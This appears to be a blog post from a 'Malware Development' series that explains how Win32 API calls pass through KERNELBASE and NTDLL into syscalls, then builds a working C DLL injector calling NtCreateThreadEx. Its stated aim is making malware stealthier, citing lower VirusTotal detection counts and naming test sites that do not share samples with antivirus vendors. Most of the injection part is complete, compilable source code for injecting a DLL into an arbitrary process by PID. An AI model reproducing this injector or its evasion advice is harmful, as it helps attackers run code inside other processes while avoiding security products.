NTAPI Injection

June 23rd, 2023

Table of Contents

Foreword

I've created a video to go along with this blog post. To watch the current installment of our "Malware Development" series, see the link below:

Overview

You may know by now that there exists the Win32 API and the native API (otherwise known as NTAPI). In this post, we're going to take a look at how the functions that you use from the standard Windows API get translated into the lower-level NTAPI/syscalls. After that, we'll program a super simple injector that will inject a DLL into our target process, except this time instead of using only Win32 API, we'll swap out one (1) function for its NTAPI counterpart. If you're looking for an example with all of the Win32 API swapped out for its NTAPI counterparts, check the article below:

You may be asking what the point of this is. Why are we even removing the high-level abstraction in the first place? Well, typically the more and more wrappers we can remove from our malware, the stealthier they become. Obviously, as time went on, defensive solutions easily caught on to this, and it's still easy to detect the use of these native API calls, however, we can still see that it does make a difference. Take, for example, the DLL Injection example from the previous blog. If we submit this to VirusTotal, we can see that ten (10) vendors pick it up as malicious:

If I take the exact same program but replace some of the Win32 API with the lower-level NTAPI from NTDLL, we should see this number get lower.

We can see that our indeed, does get a lower score. Also remember that we're just including a DLL as our payload, if we were to have some signatured shellcode like a reverse shell payload from msfvenom, our ratings would be much higher. Moreover, in that program, I've only swapped out two (2) of the Win32 API functions with their NTAPI counterparts, those being NtOpenProcess and NtCreateThreadEx. Don't worry if that looks alien to you, we'll go over that soon.

You should also be wary of uploading your malware to a site like VirusTotal (VT) if it's something you don't want to be shared with or examined by security vendors.

Some websites like VT will take your malware and share it with its partners for analysis and sample submission. Their partners are contractually obliged to use the sample you submit for internal security purposes only and for the purposes of bettering their antivirus engines, as well as detection. You can read more about this from the "Sharing & Disclosure" section of their "Privacy Policy" section:

If you'd like another site that you could use for testing that doesn't submit your sample upon submission, you could look at something like the following:

Even though the score difference doesn't seem that crazy, it's still knocking points off and making our malware more stealthy. And to reiterate, we only replaced two (2) functions. Let's move on now that we know why using something like NTAPI would be a better alternative than the standard Win32 API. Before we do that, we need to understand the difference between User-mode and Kernel-mode.

User and Kernel Mode

It's critical that we spend ample time and effort understanding these processor access modes (i.e., "user mode" and "kernel mode") because you'll be hearing these two terms all the time during your malware development journey. And it's not without reason. A lot of things like Anticheats, Antiviruses, EDRs, etc. run in kernel mode. They do this because running in kernel mode grants you access to all parts of the operating system, which if you're detecting and defending against malware, is a really important advantage to have.

"To protect user applications from accessing and/or modifying critical OS data, Windows uses two processor access modes (even if the processor on which Windows is running supports more than two): user mode and kernel mode. User application code runs in user mode, whereas OS code (such as system services and device drivers) runs in kernel mode. Kernel mode refers to a mode of execution in a processor that grants access to all system memory and all CPU instructions. Some processors differentiate between such modes by using the term code privilege level or ring level, while others use terms such as supervisor mode and application mode. Regardless of what it’s called, by providing the operating system kernel with a higher privilege level than user mode applications have, the processor provides a necessary foundation for OS designers to ensure that a misbehaving application can’t disrupt the stability of the system as a whole." - Windows Internals, Part I

x86 and x64 processors define four (4) privilege levels (or rings) to protect system code and data from being overwritten by accident or maliciously by code of lesser privilege. These rings help facilitate the "principle of least privilege" model.

If we take a look at the following diagram that shows the hierarchy of these privilege rings, we can see that the Kernel resides in the highest-privileged level (ring 0) and the applications we run, i.e., user-mode applications, reside on the lowest-privileged ring (ring 3):

If the kernel uses ring zero (0) and user applications use ring three (3), then what are rings one (1) and two (2) used for and why does Microsoft only use those aforementioned 0/3 rings?

RING0

The Kernel. Has the highest permissions, has access to everything; can communicate directly with the hardware. If something breaks here, it could crash the entire system.

RING1/2

These rings are used by things like device-drivers. They offer an advantage that user-mode (ring 3) lacks. These rings are "mostly" privileged. These rings aren't typically used in x86.

RING3

If you start an application, this is where it'll be. Things like your web browser, text editor, games, whatever, run in user-mode. This has the lowest-level of permissions. It allows for things like your games, browsers, editors, etc., to crash and not bring the entire system crumbling down with it.

"The reason why Windows uses only two levels is that some hardware architectures, such as ARM today and MIPS/Alpha in the past, implemented only two privilege levels. Settling on the lowest minimum bar allowed for a more efficient and portable architecture, especially as the other x86/x64 ring levels do not provide the same guarantees as the ring 0/ring 3 divide." - Windows Internals, Part I

To get an idea of what happens when a function gets called, let's look at a typical function's flow path.

Function Flow

When we use a standard Win32 API function like WriteFile, the Kernel doesn't execute that function right away. Quite the opposite. The function goes on a Tolkien-esque adventure before it finally ends up in kernel mode.

We can see that the program (the User Application) starts by calling the WriteFile function, which is exported from the Kernel32.dll library. This module is also responsible for exporting most, if not, all of the Win32 API functions we've been using up to this point. We already know this from the DLL Injection blog post, specifically, the "Creating the Program" section:

After Kernel32.dll, the function goes into ntdll.dll. What exactly is that? NTDLL is the last big stop that your function makes before it crosses the threshold of kernel space via the syscall, sysenter, or int 2eh instructions. It exports the "Native API" (NTAPI) just like Kernel32 exposes the Win32 API. Let's examine a sample program like the one below:

#include <windows.h>
#include <stdio.h>

int main(int argc, char* argv[]) {
    
    if (argc < 2) {
        puts("usage: handle.exe <PID>");
        return EXIT_FAILURE;
    }
    
    DWORD PID = atoi(argv[1]);
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
    printf("got a handle to the process: 0x%p\n", hProcess);
    puts("press enter to exit");
    getchar();
    CloseHandle(hProcess);
    return EXIT_SUCCESS;

}

At this point, you should know what this is doing. To resolve the API calls and see what functions our functions use, we can use an incredible tool called "API Monitor":

Start by opening the API Monitor program (it's architecture-sensitive, so make sure you open the version that corresponds with the architecture you built your program for). It's important that we specify the modules for which we'd like to monitor API calls. Because we've used Win32 API for this program, let's choose Kernel32.dll:

Once we've selected this, we can either go in and search for the specific functions (OpenProcess and CloseHandle), or we can just select a category of functions denoted by the folder names. OpenProcess belongs to the System Services > Processes and Threads section, and CloseHandle to the Windows System Information > Handles and Objects section. You can actually see this from the MSDN:

So, let's select the necessary ones.

We also want to do the same thing for the NTDLL module:

With those finally selected, we can move on to attaching our process to this program. To start our program and see what functions it calls, we can configure our startup options in File > Monitor New Process and press OK:

A new command prompt opens up and our program halts at the "press enter to exit" part. More importantly, we can see that our OpenProcess call gets captured, and even more importantly, we can see the NTAPI counterpart for it:

What an incredible program. We can see that our OpenProcess function gets translated into the lower-level NtOpenProcess NTAPI. Furthermore, this cool program shows us the parameters of this NtOpenProcess function as well.

"Hold on a minute. Crow, you said that NtOpenProcess was located in NTDLL.dll, but the program is showing the module of this function as KERNELBASE.dll. Have you just been lying to us?" Yes. Well, sort of. If we hover over the API call, we can 100% see that the function resides in NTDLL, or hell, even in the parameters section:

So this begs the question then, what the hell is that KERNELBASE.dll thing and where did it come from? KERNELBASE was made by Microsoft to act as a sort of "proxy" for your API calls. If we look at the documentation, we can see it being discussed here:

"As an example of functionality that we moved to low-level binaries, kernelbase.dll gets functionality from kernel32.dll and advapi32.dll. This means that the existing binary now forwards calls down to the new binary rather than handling them directly..." - MSDN

So far our function has taken this path:

OpenProcess (KERNEL32)
OpenProcess (KERNELBASE)
(Zw/Nt)OpenProcess (NTDLL)

There are many ways for us to see what the assembly stub of the KERNELBASE function looks like - and it's important for us to do this because it will also let us see how the function from KERNELBASE goes into NTDLL. I'll just use x64dbg, but you can very easily do this in IDA, WinDbg, etc. In the Symbols section, we can select the kernelbase.dll module, and search for the OpenProcess symbol:

Double-clicking that address and then viewing this function in the "Graph" mode of x64dbg, we can see the following:

From this, we can see the following instruction in the stub: call qword ptr ds:[<NtOpenProcess>]. This is the reference to the NTAPI inside of NTDLL. If we click on this function name, we can finally see how these functions fundamentally work and how NTAPI functions are called using their respective "System Service Numbers" (SSNs) or syscalls:

If for some reason the bitch-ass "ZwOpenProcess assembly stub" picture above isn't loading, refresh the page.

In this case, the syscall number of this function (26h) is moved into the eax register and then the syscall instruction (or int 2e) is called - after which, the function is executed. This is incredibly high level, but we'll go into more depth about this when we get to the System Calls section. As we've seen so far, NTAPI functions are distinguished by names that begin with Nt or Zw. In user mode, they're exported from NTDLL, and in kernel mode, from the NTOSKRNL module. When these functions are executed, they will return a "NTSTATUS" value. There are a metric sh*t ton of these return values:

Issues

The biggest thing you're going to realize when you start delving into the lower-level stuff is that most of it isn't documented and most of it is extremely unstable. The NTAPI from NTDLL, is not really documented; sure, the documentation does have some examples and certain references to the Native API and its functions. However, Microsoft has left it in the hands of our incredible reverse-engineering brothers and sisters to dump and figure out the inner workings of these things.

One of the more "practical" reasons why people don't just use the NTAPI is because since it's lower than the higher-level (and reliable/easy-to-use) API, it requires more fiddling to get it working right. The higher-level APIs provide a convenient and standardized interface to the underlying system. This makes it easier for developers to write software that works on multiple versions of Windows and reduces the likelihood of errors or compatibility issues. Microsoft definitely does take backward compatibility into consideration, however, things can and most likely will change. From build version to build version, and almost definitely from OS version to OS version. From this site:

We can see the work that's gone into reconstructing these NTAPI functions and structures:

If you try to visit http://undocumented.ntinternals.net/, and you're not able to reach it or even if you're having issues with the link I've embedded above (i.e. if you get a "404: File not found." error), you can go on Internet Archive (wayback machine) and search for the link there and go to a snapshot to access it.

With the NTAPI covered and some of its potential issues acknowledged, let's begin the construction of our program.

Also, please note that the site above isn't the only resource you can use for finding these functions. Actually, sometimes it could be quite problematic for some if they use this, especially if they only use this. The site is rather old so you should also be aware that some things could be wrong/inaccurate. Therefore, I've linked some alternatives that you could use to get function syntaxes and kernel structures down below.

There are probably a lot more that I'm missing, but with just these, and the previous sites mentioned so far, you should be set. Again, reach out and seek other resources, don't rely on a single resource for everything - that will only come back to bite you.

Creating the Program

As we mentioned previously, we'll just replace one of the Win32 API functions within the old DLL injection program with its NTAPI counterpart. We can do it with all of the functions, definitely. However, this might get overwhelming, and we need to learn to walk before we can run. We'll just do one for now. If you want to see an example of all of the Win32 APIs replaced by their NTAPI counterparts, check the blog post below:

A lot of these NTAPI functions require setup in the form of declaring certain structures, making function prototypes, or initializing certain things. The blog post above covers the structure setup and everything but I'll also cover it here so don't worry; I got your back.

Here's a typical Win32 API DLL Injection program that you might find floating around the musty swamps that we call the internet:

dll_injection.c

#include <windows.h>
#include <stdio.h>

int main(int argc, char* argv[]) {

    if (argc < 2) {
        puts("usage: dll_injection.exe <PID>");
        return 1;
    }

    wchar_t     dllPath[MAX_PATH] = L"C:\\path\\to\\crow.dll";
    size_t      pathSize = sizeof(dllPath);

    DWORD PID = atoi(argv[1]);
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
    HMODULE hKernel32 = GetModuleHandleW(L"kernel32");
    PTHREAD_START_ROUTINE kawLoadLibrary = (PTHREAD_START_ROUTINE)GetProcAddress(hKernel32, "LoadLibraryW");
    LPVOID rBuffer = VirtualAllocEx(hProcess, NULL, pathSize, (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
    WriteProcessMemory(hProcess, rBuffer, dllPath, pathSize, NULL);
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, kawLoadLibrary, rBuffer, 0, 0);

    WaitForSingleObject(hThread, INFINITE);
    return 0;

}

By now, you should know the mechanisms behind this code like the back of your ankles. We can start now by swapping out one of the functions from here. I'm going to swap out CreateRemoteThread for NtCreateThreadEx. Let's look at the syntax for this. I'll be getting this information from a really good resource that we've included above, the PHNT files:

From the link above, we can see the following syntax we'll use to make a function prototype:

We could just plop this into our source code, but this requires more setup from us before we can start tinkering with it. The biggest thing that we need to sort out right away, are the POBJECT_ATTRIBUTE and PPS_ATTRIBUTE_LIST structures present in the function. Those lines are referencing the _OBJECT_ATTRIBUTE and _PS_ATTRIBUTE_LIST structures. The "P" before them denotes that this parameter is a pointer to said structures.

So, because our function requires these structures, we have to include them in our project. You could include everything in one file, and that's what I used to do, but it would be cleaner for us to just make a header file to store all of this stuff so we can just work on our injection program without the extra bloat everywhere. So, in Visual Studio, let's create a new project and let's make a new header file and include the following for now:

glassBox.h

#pragma once
#pragma comment (lib, "ntdll")

#include <Windows.h>
#include <stdio.h>

/*------[SETUP MACROS]------*/
#define okay(msg, ...) printf("[+] " msg "\n", ##__VA_ARGS__)
#define warn(msg, ...) printf("[!] " msg "\n", ##__VA_ARGS__)
#define info(msg, ...) printf("[i] " msg "\n", ##__VA_ARGS__)

/*------[FUNCTION PROTOTYPE]------*/
typedef NTSTATUS(NTAPI* pNtCreateThreadEx) (
    _Out_    PHANDLE            ThreadHandle,
    _In_     ACCESS_MASK        DesiredAccess,
    _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_     HANDLE             ProcessHandle,
    _In_     PVOID              StartRoutine,
    _In_opt_ PVOID              Argument,
    _In_     ULONG              CreateFlags,
    _In_     SIZE_T             ZeroBits,
    _In_     SIZE_T             StackSize,
    _In_     SIZE_T             MaximumStackSize,
    _In_opt_ PPS_ATTRIBUTE_LIST AttributeList);

If you followed the last blog post with our simple DLL injection, these macros shouldn't be alien to you. Now, you'll notice the issue of the structures I was talking about when you just put this code above into a header file:

So, where can we find these structures? How do we know what members we need to include in our definitions? Well, we have two options here. Either we manually dump them ourselves, or, the more "sane" (but less fun) approach is to get them from sites like Vergilius, ReactOS, etc. I'll be using Vergilius for the _OBJECT_ATTRIBUTES structure. If we head to the site, and find the way to our current build of Windows, which you can get by issuing the winver command in a shell:

We can start searching for structures, we'll query the _OBJECT_ATTRIBUTES structure, as shown here:

We can then click on this, and see what the structure looks like.

You can find this yourself in the link embedded below:

Make sure to prepend the typedef keyword before the "struct" since we're trying to use it in an external file. Also, we have to give it names as well, since Vergilius just gives us the members in it, and the name at the top of the definition, we have to manually define the structure name and pointer name: OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES. Now, we've gotten rid of one red line of misery, all that's left is to abolish the other one.

You may realize that my version of Windows shown, doesn't directly match with the version of Windows I yoinked this structure definition from in Vergilius. It may be the case that that'll happen to you as well. Again, use more than one resource. For us here, it doesn't matter too much. The structure's good even for my build but as we're approaching lower and lower levels, we need to be mindful of these things because if we have even one version mismatch, things might not work. Especially in the case of structures and system calls.

With this next structure, _PS_ATTRIBUTE_LIST, it, unfortunately, won't be as easy as searching it on Vergilius and copy-pasting it in. If we look for this structure on Vergilius, we'll see that it's not actually there - which means we'll have to use something else. I found the following resource for this structure:

From the repository above, we can see that the _PS_ATTRIBUTE_LIST structure is as follows:

typedef struct _PS_ATTRIBUTE_LIST {
	SIZE_T TotalLength;					/// sizeof(PS_ATTRIBUTE_LIST)
	PS_ATTRIBUTE Attributes[2];			/// Depends on how many attribute entries should be supplied to NtCreateUserProcess
} PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;

But, we can't use this just yet. This structure references another structure on the line: PS_ATTRIBUTE Attributes[2];. Because of this, we also need to grab the _PS_ATTRIBUTE structure, which we can find directly above the _PS_ATTRIBUTE_LIST structure from the resource below:

typedef struct _PS_ATTRIBUTE {
	ULONGLONG Attribute;				/// PROC_THREAD_ATTRIBUTE_XXX | PROC_THREAD_ATTRIBUTE_XXX modifiers, see ProcThreadAttributeValue macro and Windows Internals 6 (372)
	SIZE_T Size;						/// Size of Value or *ValuePtr
	union {
		ULONG_PTR Value;				/// Reserve 8 bytes for data (such as a Handle or a data pointer)
		PVOID ValuePtr;					/// data pointer
	};
	PSIZE_T ReturnLength;				/// Either 0 or specifies size of data returned to caller via "ValuePtr"
} PS_ATTRIBUTE, *PPS_ATTRIBUTE;

Now, after including these two structures in our header file, we're all set to begin programming and we don't see any annoying red lines.

Perfect. Let's start with our actual injection program now. The one thing that I added for QoL is a function that will attempt to get a handle on the module we specify and automatically perform some "error" handling so that we don't need to spam our program with a bunch of if-else statements.

HMODULE getMod(LPCWSTR modName) {
    
    HMODULE hModule = NULL;
    info("trying to get a handle to %S", modName);

    hModule = GetModuleHandleW(modName);
    
    if (hModule == NULL) {
        warn("failed to get a handle to the module. error: 0x%lx\n", GetLastError());
        return NULL;
    }

    else {
        okay("got a handle to the module!");
        info("\\___[ %S\n\t\\_0x%p]\n", modName, hModule);
        return hModule;
    }
    
}

This function takes the name of the module you wish to get a handle on, and tries to get a handle on it - if it can't get a handle, i.e., if GetModuleHandleW returns NULL, it'll just return NULL. Anyways, let's continue. On to the main function:

(snip ...)

int main(int argc, char* argv[]) {

    DWORD             PID               = NULL;
    HANDLE            hProcess          = NULL;
    HANDLE            hThread           = NULL;
    HMODULE           hKernel32         = NULL;
    HMODULE           hNTDLL            = NULL;
    PVOID             rBuffer           = NULL;

    wchar_t           dllPath[MAX_PATH] = L"C:\\path\\to\\crow.dll";
    size_t            pathSize          = sizeof(dllPath);
    size_t            bytesWritten      = 0;

    OBJECT_ATTRIBUTES OA                = { sizeof(OA), NULL };

(snip ...)

CLEANUP:

    if (hThread) {
        info("closing handle to thread");
        CloseHandle(hThread);
    }
    if (hProcess) {
        info("closing handle to process");
        CloseHandle(hProcess);
    }
    
    okay("finished with the cleanup, exiting now.");
    return EXIT_SUCCESS;

}

All of this looks standard to what we've been doing so far, except for the initialization of the hNTDLL variable, which will be where we store the base address of the NTDLL module when we finally get a handle on it via our getMod function. The only difference we can see is the inclusion of this OBJECT_ATTRIBUTES OA = { sizeof(OA), NULL };.

This is here because NtCreateThreadEx needs a pointer to this structure for one of its arguments, but we'll get there when we get there. Another thing you'll note is the CLEANUP label that we'll use for house cleaning. This provides a very nice and efficient way to close all our handles and clean up the program upon exiting and upon errors.

There's a bit of a debate about using goto in your program - the main gripe has to do with readability, but for simple house cleaning like closing handles, I think it's actually pretty OP. Anywho, let's continue.

(snip ...)

if (argc < 2) {
        warn("usage: %s <PID>", argv[0]);
        return EXIT_FAILURE;
    }

    PID = atoi(argv[1]);
    info("trying to get a handle to the process (%ld)", PID);
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);

    if (hProcess == NULL) {
        warn("failed to get a handle to the process. error: 0x%lx", GetLastError());
        return EXIT_FAILURE;
    }

    okay("got a handle to the process!");
    info("\\___[ hProcess\n\t\\_0x%p]\n", hProcess);
    info("getting handle to Kernel32 and NTDLL");

    hNTDLL = getMod(L"ntdll.dll");
    hKernel32 = getMod(L"kernel32.dll");

    if (hNTDLL == NULL || hKernel32 == NULL) {
        warn("module(s) == NULL. error: 0x%lx", GetLastError());
        goto CLEANUP;
    }

    pNtCreateThreadEx kawCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(hNTDLL, "NtCreateThreadEx");
    okay("got the address of NtCreateThreadEx from NTDLL");
    info("\\___[ kawCreateThread\n\t\\_0x%p]\n", kawCreateThreadEx);
    PTHREAD_START_ROUTINE kawLoadLibrary = (PTHREAD_START_ROUTINE)GetProcAddress(hKernel32, "LoadLibraryW");
    okay("got the address of LoadLibrary from KERNEL32");
    info("\\___[ LoadLibraryW\n\t\\_0x%p]\n", kawLoadLibrary);
    
    rBuffer = VirtualAllocEx(hProcess, rBuffer, pathSize, (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE);

    if (rBuffer == NULL) {
        warn("failed to allocate memory in the target process. error: 0x%lx", GetLastError());
        goto CLEANUP;
    }

    okay("allocated memory in target process");

    WriteProcessMemory(hProcess, rBuffer, dllPath, pathSize, &bytesWritten);
    okay("wrote %zu-bytes to the allocated buffer", bytesWritten);

(snip ...)

We get a handle on the process pointed to by the PID we supply. After which, we use our getMod functions to get a handle to NTDLL and Kernel32. Why these two modules, specifically?

Kernel32 -> We need this for the LoadLibrary function so that we could load our module in the processes memory and have the entry point of our DLL (DllMain) run.
NTDLL -> We need to get a handle on NTDLL because we have a function prototype. We need to populate our function prototype with the address of the function we're trying to use. We're trying to use NtCreateThreadEx which resides in NTDLL, so we're going to look for it in that module, and once found, it's going to be assigned to our NtCreateThreadEx function prototype that we've defined in the glassBox.h header file.

After that, we populate our NtCreateThreadEx function prototype. Furthermore, we do what we've done previously, and we reach into Kernel32 to look for LoadLibraryW. We typecast that to PTHREAD_START_ROUTINE to tell the newly created thread that we want this to be the starting point for the thread.

We allocate a buffer to the process memory with PAGE_READWRITE permissions and write the DLL path to that allocated buffer. Now, all that's left is to use our NTAPI NtCreateThreadEx function, which we've called kawCreateThreadEx; which at this point, is primed and ready.

The NTAPI functions return a NTSTATUS. So, we can't use HANDLE here as we did in our previous examples:

HANDLE hThread = CreateRemoteThreadEx(...);

For this, we'll have to hold the return value of our kawCreateThreadEx function with a variable like:

NTSTATUS status = kawCreateThreadEx(...);

Because this function will return a NTSTATUS, we want to see if it returns one of the values seen here:

More specifically, we want to see if the STATUS_SUCCESS NTSTATUS value gets returned, which we can see is the following value:

From the same page, we can see what this value/code actually means:

We can define this value in our header file so that we can do some error handling for our kawCreateThreadEx function. So, let's set the following line:

#pragma once
#pragma comment (lib, "ntdll")

#include <Windows.h>
#include <stdio.h>

/*------[SETUP MACROS]------*/
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define okay(msg, ...) printf("[+] " msg "\n", ##__VA_ARGS__)
#define warn(msg, ...) printf("[!] " msg "\n", ##__VA_ARGS__)
#define info(msg, ...) printf("[i] " msg "\n", ##__VA_ARGS__)

(snip ...)

With that done, we can finally start filling out the arguments to our kawCreateThreadEx function.

NTSTATUS status = kawCreateThreadEx(&hThread, ...);

The first argument (ThreadHandle) is a pointer to the hThread variable that will hold the base address of the thread handle when it gets created. The second parameter (DesiredAccess) is the access we'd like for the newly created thread. We could just specify THREAD_ALL_ACCESS as our argument.

 NTSTATUS status = kawCreateThreadEx(&hThread, THREAD_ALL_ACCESS, ...);

The next argument (ObjectAttributes) we supply is a pointer to the OBJECT_ATTRIBUTES structure we created. We assigned that structure to our OA variable so let's supply that for this argument:

 NTSTATUS status = kawCreateThreadEx(&hThread, THREAD_ALL_ACCESS, &OA, ...);

Next, we supply our process handle for the ProcessHandle parameter:

 NTSTATUS status = kawCreateThreadEx(&hThread, THREAD_ALL_ACCESS, &OA, hProcess, ...);

StartRoutine is the next parameter, and we can supply our PTHREAD_START_ROUTINE-casted LoadLibraryW function (kawCreateThreadEx):

 NTSTATUS status = kawCreateThreadEx(&hThread, THREAD_ALL_ACCESS, &OA, hProcess, kawLoadLibrary, ...);

We're almost done. Argument is the next parameter, and though it's named differently, it's just going to be the rBuffer that we've created since that will be holding the dllPath in it at this point.

 NTSTATUS status = kawCreateThreadEx(&hThread, THREAD_ALL_ACCESS, &OA, hProcess, kawLoadLibrary, rBuffer, ...);

The next couple of parameters are all going to be NULL or 0.

CreateFlags -> FALSE
ZeroBits -> NULL
StackSize -> NULL
MaximumStackSize -> NULL
AttributeList -> NULL

  NTSTATUS status = kawCreateThreadEx(&hThread, THREAD_ALL_ACCESS, &OA, hProcess, kawLoadLibrary, rBuffer, FALSE, NULL, NULL, NULL, NULL);

After this function executes, we can do a test to see if the NTSTATUS value returned by it is STATUS_SUCCESS or not. Then, we can finally finish up and begin cleanup:

(snip ...)

 if (status != STATUS_SUCCESS) {
        warn("failed to create thread, error: 0x%lx", status);
        goto CLEANUP;
    }

    okay("created thread, waiting for it to finish");
    
    WaitForSingleObject(hThread, INFINITE);
    okay("thread finished execution.");
    info("cleaning up now");
    goto CLEANUP;

CLEANUP:

    if (hThread) {
        info("closing handle to thread");
        CloseHandle(hThread);
    }
    if (hProcess) {
        info("closing handle to process");
        CloseHandle(hProcess);
    }

    okay("finished with the cleanup, exiting now.");
    return EXIT_SUCCESS;

}

With that, we're finally finished programming our injection program. You can find these files below or in the GitHub repository.

Performing the Injection

After compiling the program, we can test it out by injecting a humble notepad or paint process. Also, note that because this is just a glorified DLL injection, the caveats we've previously mentioned in the DLL Injection blog post, are still present here - mechanics-wise. The only thing we've slightly improved here is the stealth factor. Although, again, not by much. Better than nothing, but definitely a long way from perfection as well.

Nice. Now, if we wait for the thread to finish (which will only finish after we've pressed OK), the program will begin cleanup:

There we go! You've just successfully replaced one (1) Win32 API function with its NTAPI counterpart from NTDLL. In the next blog post, we'll replace all of the Win32 API functions with their Native API counterparts. Until then, stay safe. Keep on hackin'

References

NTDLL

Native API Functions

Learning Malware AnalysisO’Reilly Online Learning

Guide - [Theory] Native Windows API (NTAPI)MalwareTips Forums

Microsoft Windows library filesWikipedia

DLL injection via undocumented NtCreateThreadEx. Simple C++ example.cocomelonc

Windows Internals: System architecture, processes, threads, memory management, and more, Part 1Amazon.ca

PreviousDLL Injection NextComplete NTAPI Implementation

Last updated 1 year ago

Was this helpful?